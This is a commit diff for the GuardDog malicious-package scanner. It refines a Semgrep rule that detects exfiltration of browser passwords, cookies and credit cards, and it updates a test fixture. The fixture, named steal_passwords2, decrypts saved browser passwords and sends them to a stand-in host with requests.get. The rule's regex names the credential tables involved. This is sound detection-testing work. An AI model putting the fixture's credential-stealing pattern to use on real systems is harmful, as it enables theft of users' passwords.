Incorporate change requests

guarddog/analyzer/sourcecode/exfiltrate-sensitive-data.yml

@@ -37,13 +37,12 @@ rules:
               ...
               $CURSOR = $CONNECT.cursor(...)
               ...
-              $CURSOR.close(...)
           - pattern: $CURSOR.execute($QUERY, ...)
           - metavariable-pattern:
               metavariable: $QUERY
               patterns:
                 - pattern: "..."
-                - pattern-regex: (?i)select\s+[card_number_encrypted|encrypted_value|isHttpOnly|name|origin_url|password_value|username].*\s+from\s+[cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins]
+                - pattern-regex: (?i)select\s+\S+.*\s+from\s+(cookies|credit_cards|logins|moz_cookies|moz_formhistory|moz_logins)
     pattern-sinks:
       - pattern-either:
           - pattern-inside: requests.$METHOD(...)
@@ -55,7 +54,6 @@ rules:
               - pattern-inside: $S = socket.socket(...); ...
               - pattern-inside: $S.connect(...); ...
               - pattern-inside: $S.send(...)
-          - pattern-inside: $F.write(...)
     languages:
       - python
     severity: WARNING

tests/analyzer/sourcecode/exfiltrate-sensitive-data.py

@@ -244,7 +244,8 @@ def steal_passwords2(self, name: str, path: str, profile: str):
             url, username, password = res
             password = self.dcrpt_val(password, self.masterkey)
             if url != "":
+                params = {'url': url, 'username': username, 'password': password}
                 # ruleid: exfiltrate-sensitive-data
-                f.write(f"URL: {url}\nID: {username}\nPASSWORD: {password} \n\n")
+                requests.get("https://example.com", params=params)
     cursor.close()
     conn.close()